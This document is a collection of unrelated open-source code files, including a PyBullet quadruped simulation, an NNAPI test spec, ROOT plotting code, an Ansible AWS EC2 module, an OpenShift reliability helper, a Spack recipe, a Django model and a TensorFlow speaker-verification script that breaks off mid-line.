p.VELOCITY_CONTROL, 0, kneeFrictionForce) p.setGravity(0, 0, -10) legnumbering = [ motor_front_leftL_joint, motor_front_leftR_joint, motor_back_leftL_joint, motor_back_leftR_joint, motor_front_rightL_joint, motor_front_rightR_joint, motor_back_rightL_joint, motor_back_rightR_joint ] for i in range(8): print(legnumbering[i]) #use the Minitaur leg numbering p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[0], controlMode=p.POSITION_CONTROL, targetPosition=motordir[0] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[1], controlMode=p.POSITION_CONTROL, targetPosition=motordir[1] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[2], controlMode=p.POSITION_CONTROL, targetPosition=motordir[2] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[3], controlMode=p.POSITION_CONTROL, targetPosition=motordir[3] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[4], controlMode=p.POSITION_CONTROL, targetPosition=motordir[4] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[5], controlMode=p.POSITION_CONTROL, targetPosition=motordir[5] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[6], controlMode=p.POSITION_CONTROL, targetPosition=motordir[6] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[7], controlMode=p.POSITION_CONTROL, targetPosition=motordir[7] * 1.57, positionGain=kp, velocityGain=kd, force=maxForce) #stand still p.setRealTimeSimulation(useRealTime) t = 0.0 t_end = t + 15 ref_time = time.time() while (t < t_end): p.setGravity(0, 0, -10) if (useRealTime): t = time.time() - ref_time else: t = t + fixedTimeStep if (useRealTime == 0): p.stepSimulation() time.sleep(fixedTimeStep) print("quadruped Id = ") print(quadruped) p.saveWorld("quadru.py") logId = p.startStateLogging(p.STATE_LOGGING_MINITAUR, "quadrupedLog.bin", [quadruped]) #jump t = 0.0 t_end = t + 100 i = 0 ref_time = time.time() while (1): if (useRealTime): t = time.time() - ref_time else: t = t + fixedTimeStep if (True): target = math.sin(t * speed) * jump_amp + 1.57 p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[0], controlMode=p.POSITION_CONTROL, targetPosition=motordir[0] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[1], controlMode=p.POSITION_CONTROL, targetPosition=motordir[1] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[2], controlMode=p.POSITION_CONTROL, targetPosition=motordir[2] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[3], controlMode=p.POSITION_CONTROL, targetPosition=motordir[3] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[4], controlMode=p.POSITION_CONTROL, targetPosition=motordir[4] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[5], controlMode=p.POSITION_CONTROL, targetPosition=motordir[5] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[6], controlMode=p.POSITION_CONTROL, targetPosition=motordir[6] * target, positionGain=kp, velocityGain=kd, force=maxForce) p.setJointMotorControl2(bodyIndex=quadruped, jointIndex=legnumbering[7], controlMode=p.POSITION_CONTROL, targetPosition=motordir[7] * target, positionGain=kp, velocityGain=kd, force=maxForce) if (useRealTime == 0): p.stepSimulation() time.sleep(fixedTimeStep)
tests/nnapi/specs/skip/V1_2/space_to_batch_v1_2.mod.py
periannath/ONE
255
29884
<filename>tests/nnapi/specs/skip/V1_2/space_to_batch_v1_2.mod.py # # Copyright (C) 2018 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # layout = BoolScalar("layout", False) # NHWC # TEST 1: SPACE_TO_BATCH_NCHW_1, block_size = [2, 2] i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 2, 2}") pad1 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [0, 0, 0, 0]) o1 = Output("op4", "TENSOR_FLOAT32", "{4, 1, 1, 2}") Model().Operation("SPACE_TO_BATCH_ND", i1, [2, 2], pad1, layout).To(o1) # Additional data type quant8 = DataTypeConverter().Identify({ i1: ("TENSOR_QUANT8_ASYMM", 0.1, 0), o1: ("TENSOR_QUANT8_ASYMM", 0.1, 0) }) # Instantiate an example example = Example({ i1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1], o1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1] }).AddNchw(i1, o1, layout).AddVariations("relaxed", "float16", quant8) # TEST 2: SPACE_TO_BATCH_NCHW_2, block_size = [2, 2] i2 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 4, 1}") o2 = Output("op4", "TENSOR_FLOAT32", "{4, 2, 2, 1}") Model().Operation("SPACE_TO_BATCH_ND", i2, [2, 2], pad1, layout).To(o2) # Additional data type quant8 = DataTypeConverter().Identify({ i2: ("TENSOR_QUANT8_ASYMM", 0.5, 0), o2: ("TENSOR_QUANT8_ASYMM", 0.5, 0) }) # Instantiate an example example = Example({ i2: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], o2: [1, 3, 9, 11, 2, 4, 10, 12, 5, 7, 13, 15, 6, 8, 14, 16] }).AddNchw(i2, o2, layout).AddVariations("relaxed", "float16", quant8) # TEST 3: SPACE_TO_BATCH_NCHW_3, block_size = [3, 2] i3 = Input("op1", "TENSOR_FLOAT32", "{1, 5, 2, 1}") pad3 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 0, 2, 0]) o3 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 2, 1}") Model().Operation("SPACE_TO_BATCH_ND", i3, [3, 2], pad3, layout).To(o3) # Additional data type quant8 = DataTypeConverter().Identify({ i3: ("TENSOR_QUANT8_ASYMM", 0.5, 128), o3: ("TENSOR_QUANT8_ASYMM", 0.5, 128) }) # Instantiate an example example = Example({ i3: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], o3: [0, 0, 0, 5, 0, 0, 0, 6, 0, 1, 0, 7, 0, 2, 0, 8, 0, 3, 0, 9, 0, 4, 0, 10] }).AddNchw(i3, o3, layout).AddVariations("relaxed", "float16", quant8) # TEST 4: SPACE_TO_BATCH_NCHW_4, block_size = [3, 2] i4 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 2, 1}") pad4 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 1, 2, 4]) o4 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 4, 1}") Model().Operation("SPACE_TO_BATCH_ND", i4, [3, 2], pad4, layout).To(o4) # Additional data type quant8 = DataTypeConverter().Identify({ i4: ("TENSOR_QUANT8_ASYMM", 0.25, 128), o4: ("TENSOR_QUANT8_ASYMM", 0.25, 128) }) # Instantiate an example example = Example({ i4: [1, 2, 3, 4, 5, 6, 7, 8], o4: [0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 1, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0] }).AddNchw(i4, o4, layout).AddVariations("relaxed", "float16", quant8)
PWGJE/EMCALJetTasks/Tracks/analysis/old/ComparePeriodsTriggerToMB.py
maroozm/AliPhysics
114
29894
<filename>PWGJE/EMCALJetTasks/Tracks/analysis/old/ComparePeriodsTriggerToMB.py<gh_stars>100-1000 #! /usr/bin/env python from ROOT import TCanvas, TGraphErrors, TLegend, TPaveText from ROOT import kBlack, kBlue, kRed from Helper import Frame, ReadHistList from Graphics import Style from SpectrumContainer import DataContainer from copy import deepcopy class PeriodComparisonPlot: def __init__(self): self.__comparisons = [] self.__canvas = None self.__frames = {} self.__legend = None def AddComparison(self, comp): self.__comparisons.append(comp) def SetPlotRange(self, min ,max): for comp in self.__comparisons: comp.SetPlotRange(min, max) def Draw(self): self.__canvas = TCanvas("comparison%s" %(self.__comparisons[0].GetTriggerName()), "Comparison of different periods for trigger %s" %(self.__comparisons[0].GetTriggerName()), 1000, 600) self.__canvas.Divide(2,1) self.__legend = TLegend(0.15, 0.15, 0.45, 0.45) self.__legend.SetBorderSize(0) self.__legend.SetFillStyle(0) self.__legend.SetTextFont(42) specpad = self.__canvas.cd(1) specpad.SetGrid(False,False) specpad.SetLogx(True) specpad.SetLogy(True) self.__frames["Spectra"] = Frame("axisSpec%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 1e-10, 100) self.__frames["Spectra"].SetXtitle("p_{t} (GeV/c)") self.__frames["Spectra"].SetYtitle("1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})") self.__frames["Spectra"].Draw() self.__comparisons[0].DrawMinBiasSpectrum() self.__comparisons[0].AddMBtoLegend(self.__legend) for comp in sorted(self.__comparisons): comp.DrawTriggeredSpectrum() comp.AddTriggeredSpectrumToLegend(self.__legend) self.__legend.Draw() self.__label = self.__comparisons[0].CreateLabel(0.5, 0.75, 0.89, 0.85) self.__label.Draw() rpad = self.__canvas.cd(2) rpad.SetGrid(False, False) self.__frames["Ratios"] = Frame("axisRatio%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 0, 2000) self.__frames["Ratios"].SetXtitle("p_{t} (GeV/c)") self.__frames["Ratios"].SetYtitle("%s / Min. Bias" %(self.__comparisons[0].GetTriggerName())) self.__frames["Ratios"].Draw() for comp in sorted(self.__comparisons): comp.DrawRatioTriggeredMinBias() self.__canvas.cd() def SaveAs(self, filenamebase): """ Save plot as image file """ types = ["eps", "pdf", "jpeg", "gif", "png"] for t in types: self.__canvas.SaveAs("%s.%s" %(filenamebase, t)) class TriggerComparison: def __init__(self, trgspec, mbspec, triggername, dataname): self.__triggeredspectrum = trgspec self.__minbiasspectrum = mbspec self.__ratiospectra = self.__triggeredspectrum.MakeRatio(self.__minbiasspectrum) self.__ratiospectra.SetStyle(self.__triggeredspectrum.GetStyle()) self.__triggername = triggername self.__dataname = dataname def __cmp__(self, other): othername = other.GetDataName() if self.__dataname == othername: return 0 elif self.__dataname < othername: return -1 else: return 1 def SetPlotRange(self, min, max): self.__triggeredspectrum.SetPlotRange(min, max) self.__minbiasspectrum.SetPlotRange(min, max) self.__ratiospectra.SetPlotRange(min, max) def GetTriggerName(self): return self.__triggername def GetDataName(self): return self.__dataname def DrawTriggeredSpectrum(self): self.__triggeredspectrum.Draw() def DrawMinBiasSpectrum(self): self.__minbiasspectrum.Draw() def DrawRatioTriggeredMinBias(self): self.__ratiospectra.Draw() def AddMBtoLegend(self, leg): self.__minbiasspectrum.AddToLegend(leg, "MinBias") def AddTriggeredSpectrumToLegend(self, leg): self.__triggeredspectrum.AddToLegend(leg, self.__dataname) def CreateLabel(self, xmin, ymin, xmax, ymax): label = TPaveText(xmin, ymin, xmax, ymax, "NDC") label.SetBorderSize(0) label.SetFillStyle(0) label.SetTextFont(42) label.AddText("Trigger: %s" %(self.__triggername)) return label class GraphicsObject: def __init__(self, data, name): self._data = data self._graphics = None self._style = Style(kBlack, 20) self._plotrange = {"Min":None, "Max":None} self._name = name def SetPlotRange(self, min, max): self._plotrange[min] = min self._plotrange[max] = max def SetStyle(self, style): self._style = style def SetName(self, name): self._name = name def GetData(self): return self._data def GetGraphics(self): return self._graphics def GetStyle(self): return self._style def Draw(self): if not self._graphics: self._graphics = TGraphErrors() np = 0 for bin in range(1, self._data.GetXaxis().GetNbins()+1): if self._plotrange["Min"] and self._data.GetXaxis().GetBinLowEdge(bin) < self._plotrange["Min"]: continue if self._plotrange["Max"] and self._data.GetXaxis().GetBinUpEdge(bin) > self._plotrange["Max"]: break self._graphics.SetPoint(np, self._data.GetXaxis().GetBinCenter(bin), self._data.GetBinContent(bin)) self._graphics.SetPointError(np, self._data.GetXaxis().GetBinWidth(bin)/2., self._data.GetBinError(bin)) np = np + 1 self._graphics.SetMarkerColor(self._style.GetColor()) self._graphics.SetLineColor(self._style.GetColor()) self._graphics.SetMarkerStyle(self._style.GetMarker()) self._graphics.Draw("epsame") def AddToLegend(self, legend, title = None): if self._graphics: tit = self._name if title: tit = title legend.AddEntry(self._graphics, tit, "lep") class Spectrum(GraphicsObject): def __init__(self, data, name): GraphicsObject.__init__(self, data, name) def MakeRatio(self, denominator): result = deepcopy(self._data) result.Divide(denominator.GetData()) ratio = Ratio(result) if self._plotrange["Min"] or self._plotrange["Max"]: ratio.SetPlotRange(self._plotrange["Min"], self._plotrange["Max"]) return ratio class Ratio(GraphicsObject): def __init__(self, data, name = None): GraphicsObject.__init__(self, data, name) def ReadSpectra(filename, trigger): """ Read the spectra for different trigger classes from the root file Returns a dictionary of triggers - spectrum container """ hlist = ReadHistList(filename, "PtEMCalTriggerTask") return DataContainer(eventHist = hlist.FindObject("hEventHist%s" %(trigger)), trackHist = hlist.FindObject("hTrackHist%s" %(trigger))) def MakeNormalisedSpectrum(inputdata, name): """ Normalise spectrum by the number of events and by the bin width """ inputdata.SetVertexRange(-10., 10.) inputdata.SetPileupRejection(True) inputdata.SelectTrackCuts(1) return inputdata.MakeProjection(0, "ptSpectrum%s" %(name), "p_{t} (GeV/c)", "1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})") def ComparePeriods(filea, fileb, filemb, namea, nameb, trigger): triggers = {} dataA = ReadSpectra(filea, trigger) dataB = ReadSpectra(fileb, trigger) dataMB = ReadSpectra(filemb, "MinBias") specA = Spectrum(MakeNormalisedSpectrum(dataA, namea), namea) specA.SetStyle(Style(kBlue, 24)) specB = Spectrum(MakeNormalisedSpectrum(dataB, nameb), nameb) specB.SetStyle(Style(kRed, 25)) specMB = Spectrum(MakeNormalisedSpectrum(dataMB, "MinBias"), "MinBias") specMB.SetStyle(Style(kBlack, 25)) plot = PeriodComparisonPlot() plot.AddComparison(TriggerComparison(specA, specMB, trigger, namea)) plot.AddComparison(TriggerComparison(specB, specMB, trigger, nameb)) plot.SetPlotRange(2., 100.) plot.Draw() return plot
pool_automation/roles/aws_manage/library/stateful_set.py
Rob-S/indy-node
627
29927
<gh_stars>100-1000 #!/usr/bin/python import re from itertools import cycle from collections import namedtuple, defaultdict, OrderedDict import boto3 from ansible.module_utils.basic import AnsibleModule # import logging # boto3.set_stream_logger('', logging.DEBUG) HostInfo = namedtuple('HostInfo', 'tag_id public_ip user') InstanceParams = namedtuple( 'InstanceParams', 'project namespace group add_tags key_name security_group ' 'type_name market_spot spot_max_price ebs_volume_size ebs_volume_type') ManageResults = namedtuple('ManageResults', 'changed active terminated') class AWSRegion(object): def __init__(self, code, location, expensive=False): self.code = code self.location = location self.expensive = expensive # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html # # prices: # - https://aws.amazon.com/ec2/pricing/ # - https://www.concurrencylabs.com/blog/choose-your-aws-region-wisely/ # # TODO automate or update periodically AWS_REGIONS = OrderedDict([(r.code, r) for r in [ AWSRegion('us-east-1', 'US East (N. Virginia)'), AWSRegion('us-east-2', 'US East (Ohio)'), AWSRegion('us-west-1', 'US West (N. California)'), AWSRegion('us-west-2', 'US West (Oregon)'), AWSRegion('ca-central-1', 'Canada (Central)'), AWSRegion('eu-central-1', 'EU (Frankfurt)'), AWSRegion('eu-west-1', 'EU (Ireland)'), AWSRegion('eu-west-2', 'EU (London)'), AWSRegion('eu-west-3', 'EU (Paris)'), AWSRegion('ap-northeast-1', 'Asia Pacific (Tokyo)'), AWSRegion('ap-northeast-2', 'Asia Pacific (Seoul)'), # some specific one, requires service subscriptions # (ClientError: An error occurred (OptInRequired) when calling the DescribeInstances operation) # AWSRegion('ap-northeast-3', 'Asia Pacific (Osaka-Local)'), AWSRegion('ap-southeast-1', 'Asia Pacific (Singapore)'), AWSRegion('ap-southeast-2', 'Asia Pacific (Sydney)'), AWSRegion('ap-south-1', 'Asia Pacific (Mumbai)'), AWSRegion('sa-east-1', 'South America (Sao Paulo)', True), ]]) # TODO # - think about moving these module level funcitons into classes # - cache results def find_ubuntu_ami(ec2): images = ec2.images.filter( Owners=['099720109477'], Filters=[ { 'Name': 'name', 'Values': ['ubuntu/images/hvm-ssd/ubuntu-xenial-16.04-amd64-server*'] } ]) # Return latest image available images = sorted(images, key=lambda v: v.creation_date) return images[-1].image_id if len(images) > 0 else None def find_instances(ec2, project, namespace, group=None): filters = [ {'Name': 'tag:Project', 'Values': [project]}, {'Name': 'tag:Namespace', 'Values': [namespace]} ] if group is not None: filters.append({'Name': 'tag:Group', 'Values': [group]}) return [instance for instance in ec2.instances.filter(Filters=filters) if instance.state['Name'] not in ['terminated', 'shutting-down']] def valid_instances(regions, count): result = defaultdict(list) for i, region in zip(range(count), cycle(regions)): result[region].append(str(i + 1)) return result def get_tag(obj, name): for tag in obj.tags: if tag['Key'] == name: return tag['Value'] return None class AwsEC2Waiter(object): """ Base class for EC2 actors which calls long running async actions. """ def __init__(self, ev_name): self._awaited = defaultdict(list) self._ev_name = ev_name @property def awaited(self): return dict(self._awaited) def _instance_region(self, instance): # TODO more mature would be to use # ec2.client.describe_availability_zones # and create a map av.zone -> region return instance.placement['AvailabilityZone'][:-1] def add_instance(self, instance, region=None): # fallback - autodetect placement region, # might lead to additional AWS API calls if not region: region = self._instance_region(instance) self._awaited[region].append(instance) def wait(self, update=True): for region, instances in dict(self._awaited).iteritems(): ec2cl = boto3.client('ec2', region_name=region) ec2cl.get_waiter(self._ev_name).wait( InstanceIds=[inst.id for inst in instances]) if update: for inst in instances: inst.reload() del self._awaited[region] class AwsEC2Terminator(AwsEC2Waiter): """ Helper class to terminate EC2 instances. """ def __init__(self): super(AwsEC2Terminator, self).__init__('instance_terminated') def terminate(self, instance, region=None): instance.terminate() self.add_instance(instance, region) # cancel spot request if any if instance.spot_instance_request_id: ec2cl = boto3.client('ec2', region_name=(region if region else self._instance_region(instance))) ec2cl.cancel_spot_instance_requests( SpotInstanceRequestIds=[instance.spot_instance_request_id]) class AwsEC2Launcher(AwsEC2Waiter): """ Helper class to launch EC2 instances. """ _camel_to_snake_re1 = re.compile('(.)([A-Z][a-z]+)') _camel_to_snake_re2 = re.compile('([a-z0-9])([A-Z])') def __init__(self): # TODO consider to use waiter for 'instance_status_ok' # if 'instance_running' is not enough in any circumstances super(AwsEC2Launcher, self).__init__('instance_running') @classmethod def _camel_to_snake(cls, camel_one): # borrowed from here: # https://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-camelcase-to-snake-case return cls._camel_to_snake_re2.sub( r'\1_\2', cls._camel_to_snake_re1.sub(r'\1_\2', camel_one)).lower() def launch(self, params, count, region=None, ec2=None): def _get_options(opts_list, prefix=''): res = {} for opt in opts_list: _opt = prefix + self._camel_to_snake(opt) if getattr(params, _opt) is not None: res[opt] = getattr(params, _opt) return res if not ec2: ec2 = boto3.resource('ec2', region_name=region) spot_opts_list = ( 'MaxPrice', ) # Note: default value type depends on region for API calls # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html ebs_opts_list = ( 'VolumeSize', 'VolumeType', ) launch_spec = { 'ImageId': find_ubuntu_ami(ec2), 'KeyName': params.key_name, 'SecurityGroups': [params.security_group], 'InstanceType': params.type_name, 'MinCount': count, 'MaxCount': count, 'TagSpecifications': [ { 'ResourceType': rc_type, 'Tags': [ { 'Key': 'Project', 'Value': params.project }, { 'Key': 'Namespace', 'Value': params.namespace }, { 'Key': 'Group', 'Value': params.group } ] + [ {'Key': k, 'Value': v} for k, v in params.add_tags.iteritems() ] } for rc_type in ('instance', 'volume') ] } # ebs ebs_options = _get_options(ebs_opts_list, 'ebs_') if ebs_options: launch_spec['BlockDeviceMappings'] = [{ 'DeviceName': '/dev/sda1', 'Ebs': ebs_options }] # spot if params.market_spot: launch_spec['InstanceMarketOptions'] = { 'MarketType': 'spot', 'SpotOptions': _get_options(spot_opts_list, 'spot_') } # tags instances = ec2.create_instances(**launch_spec) for i in instances: self.add_instance(i, region) return instances def manage_instances(regions, params, count): hosts = [] terminated = [] tag_ids = [] changed = False def _host_info(inst): return HostInfo( tag_id=get_tag(inst, 'ID'), public_ip=inst.public_ip_address, user='ubuntu') aws_launcher = AwsEC2Launcher() aws_terminator = AwsEC2Terminator() valid_region_ids = valid_instances(regions, count) for region in AWS_REGIONS.keys(): ec2 = boto3.resource('ec2', region_name=region) valid_ids = valid_region_ids[region] instances = find_instances( ec2, params.project, params.namespace, params.group) for inst in instances: tag_id = get_tag(inst, 'ID') if tag_id in valid_ids: valid_ids.remove(tag_id) hosts.append(inst) aws_launcher.add_instance(inst, region) else: terminated.append(_host_info(inst)) aws_terminator.terminate(inst, region) changed = True if valid_ids: instances = aws_launcher.launch( params, len(valid_ids), region=region, ec2=ec2) for inst, tag_id in zip(instances, valid_ids): tag_ids.append((inst, tag_id)) hosts.append(inst) changed = True aws_launcher.wait() # add tags based on id once instances are running for inst, tag_id in tag_ids: inst.create_tags(Tags=[ {'Key': 'Name', 'Value': "{}-{}-{}-{}" .format(params.project, params.namespace, params.group, tag_id.zfill(3)).lower()}, {'Key': 'ID', 'Value': tag_id}]) aws_terminator.wait() return ManageResults( changed, [_host_info(inst) for inst in hosts], terminated ) def run(module): params = module.params inst_params = InstanceParams( project=params['project'], namespace=params['namespace'], group=params['group'], add_tags=params['add_tags'], key_name=params['key_name'], security_group=params['security_group'], type_name=params['instance_type'], market_spot=params['market_spot'], spot_max_price=params['spot_max_price'], ebs_volume_size=params['ebs_volume_size'], ebs_volume_type=params['ebs_volume_type'], ) res = manage_instances( params['regions'], inst_params, params['instance_count']) module.exit_json( changed=res.changed, active=[r.__dict__ for r in res.active], terminated=[r.__dict__ for r in res.terminated] ) if __name__ == '__main__': module_args = dict( regions=dict(type='list', required=True), project=dict(type='str', required=True), namespace=dict(type='str', required=True), group=dict(type='str', required=True), add_tags=dict(type='dict', required=False, default=dict()), key_name=dict(type='str', required=True), security_group=dict(type='str', required=True), instance_type=dict(type='str', required=True), instance_count=dict(type='int', required=True), market_spot=dict(type='bool', required=False, default=False), spot_max_price=dict(type='str', required=False, default=None), ebs_volume_size=dict(type='int', required=False, default=None), ebs_volume_type=dict(type='str', required=False, default=None), ) module = AnsibleModule( argument_spec=module_args, supports_check_mode=True ) run(module)
reliability/tasks/Apps.py
RH-ematysek/svt
115
29948
from .GlobalData import global_data from .utils.oc import oc import requests import time import logging class App: def __init__(self, deployment, project, template, build_config,route=""): self.project = project self.template = template self.deployment = deployment self.build_config = build_config self.route = route self.logger = logging.getLogger('reliability') def build(self, kubeconfig): (result, rc) = oc("start-build -n " + self.project + " " + self.build_config, kubeconfig) if rc != 0: self.logger.error("build_app: Failed to create app " + self.deployment + " in project " + self.project) return "App build failed for build config : " + self.build_config else: with global_data.builds_lock: global_data.total_build_count += 1 return "App build succeeded for build config : " + self.build_config def visit(self): visit_success = False try: r = requests.get("http://" + self.route + "/") self.logger.info(str(r.status_code) + ": visit: " + self.route) if r.status_code == 200: visit_success = True except Exception as e : self.logger.error(f"visit: {self.route} Exception {e}") return visit_success def scale_up(self, kubeconfig): (result, rc) = oc("scale --replicas=2 -n " + self.project + " dc/" + self.deployment, kubeconfig) if rc !=0 : self.logger.error("scale_up: Failed to scale up " + self.project + "." + self.deployment) return "App scale up failed for deployment : " + self.deployment else: return "App scale up succeeded for deployment : " + self.deployment def scale_down(self, kubeconfig): (result, rc) = oc("scale --replicas=1 -n " + self.project + " dc/" + self.deployment, kubeconfig) if rc !=0 : self.logger.error("scale_down: Failed to scale down " + self.project + "." + self.deployment) return "App scale down failed for deployment : " + self.deployment else: return "App scale down succeeded for deployment : " + self.deployment class Apps: def __init__(self): self.failed_apps = 0 self.apps = {} self.logger = logging.getLogger('reliability') def add(self, app, kubeconfig): (result, rc) = oc("new-app -n " + app.project + " --template " + app.template, kubeconfig) if rc != 0: self.logger.error("create_app: Failed to create app " + app.deployment + " in project " + app.project) return None else: self.apps[app.project + "." + app.deployment] = app (route,rc) = oc("get route --no-headers -n " + app.project + " | awk {'print $2'} | grep " + app.template, kubeconfig) if rc == 0: app.route = route.rstrip() max_tries = 60 current_tries = 0 visit_success = False while not visit_success and current_tries <= max_tries: self.logger.info(app.template + " route not available yet, sleeping 10 seconds") time.sleep(10) current_tries += 1 visit_success = app.visit() if not visit_success: self.failed_apps += 1 self.logger.error("add_app: " + app.project + "." + app.deployment + " did not become available" ) return app # removing an app just removes the dictionary entry, actual app removed by project deletion def remove(self,app): self.apps.pop(app.project + "." + app.deployment) def simulate(self): apps = {} app1 = App('cakephp-mysql-example','cakephp-mysql-example-0','cakephp-mysql-example','cakephp-mysql-example') self.apps[app1.project + "." + app1.deployment] = app1 # app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example') # self.apps[app2.project + "." + app2.deployment] = app2 def init(self): pass all_apps=Apps() if __name__ == "__main__": app = App("cakephp-mysql-example", "t1", "cakephp-mysql-example","cakephp-mysql-example") apps = Apps() # apps.add(app) # time.sleep(180) app.visit() app.scale_up() time.sleep(30) app.scale_down() app.build()
var/spack/repos/builtin/packages/liblzf/package.py
BenWibking/spack
2,360
29971
<gh_stars>1000+ # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Liblzf(AutotoolsPackage): """LibLZF is a very small data compression library. It consists of only two .c and two .h files and is very easy to incorporate into your own programs. The compression algorithm is very, very fast, yet still written in portable C.""" homepage = "http://oldhome.schmorp.de/marc/liblzf.html" url = "http://dist.schmorp.de/liblzf/liblzf-3.6.tar.gz" version('3.6', sha256='9c5de01f7b9ccae40c3f619d26a7abec9986c06c36d260c179cedd04b89fb46a')
apps/payroll/models/employee.py
youssriaboelseod/pyerp
115
29979
<filename>apps/payroll/models/employee.py # Django Library from django.contrib.auth.models import User from django.db import models from django.urls import reverse from django.utils.translation import ugettext_lazy as _ # Thirdparty Library from apps.base.models import PyFather # Tabla de Empleados class PyEmployee(PyFather): name = models.CharField('Nombre', max_length=80) name2 = models.CharField('<NAME>', max_length=80, blank=True) first_name = models.CharField('Apellido Paterno', max_length=80, blank=True) last_name = models.CharField('Apellido Materno', max_length=80, blank=True) phone = models.CharField('Teléfono', max_length=20, blank=True) email = models.CharField('Correo', max_length=40, blank=True) def get_absolute_url(self): return reverse('payroll:employee-detail', kwargs={'pk': self.pk}) def __str__(self): return format(self.name)
model_zoo/jag_utils/python/build_inclusive_from_exclusive.py
jonesholger/lbann
194
29991
import sys if len(sys.argv) != 4 : print 'usage:', sys.argv[0], 'index_fn id_mapping_fn output_fn' exit(9) a = open(sys.argv[1]) a.readline() header = a.readline() dir = a.readline() #build map: filename -> set of bad samples mp = {} mp_good = {} mp_bad = {} for line in a : t = line.split() mp[t[0]] = set() mp_good[t[0]] = t[1] mp_bad[t[0]] = t[2] for id in t[3:] : mp[t[0]].add(id) a.close() out = open(sys.argv[3], 'w') out.write('CONDUIT_HDF5_INCLUSION\n') out.write(header) out.write(dir) a = open(sys.argv[2]) bad = 0 for line in a : t = line.split() fn = t[0] out.write(fn + ' ' + mp_good[fn] + ' ' + mp_bad[fn] + ' ') for id in t[1:] : if id not in mp[fn] : out.write(id + ' ') else : bad += 1 out.write('\n') out.close() print header print 'num found bad:', bad
model.py
ishine/Speaker_Verification
337
29994
import tensorflow as tf import numpy as np import os import time from utils import random_batch, normalize, similarity, loss_cal, optim from configuration import get_config from tensorflow.contrib import rnn config = get_config() def train(path): tf.reset_default_graph() # reset graph # draw graph batch = tf.placeholder(shape= [None, config.N*config.M, 40], dtype=tf.float32) # input batch (time x batch x n_mel) lr = tf.placeholder(dtype= tf.float32) # learning rate global_step = tf.Variable(0, name='global_step', trainable=False) w = tf.get_variable("w", initializer= np.array([10], dtype=np.float32)) b = tf.get_variable("b", initializer= np.array([-5], dtype=np.float32)) # embedding lstm (3-layer default) with tf.variable_scope("lstm"): lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)] lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # define lstm op and variables outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn embedded = outputs[-1] # the last ouput is the embedded d-vector embedded = normalize(embedded) # normalize print("embedded size: ", embedded.shape) # loss sim_matrix = similarity(embedded, w, b) print("similarity matrix size: ", sim_matrix.shape) loss = loss_cal(sim_matrix, type=config.loss) # optimizer operation trainable_vars= tf.trainable_variables() # get variable list optimizer= optim(lr) # get optimizer (type is determined by configuration) grads, vars= 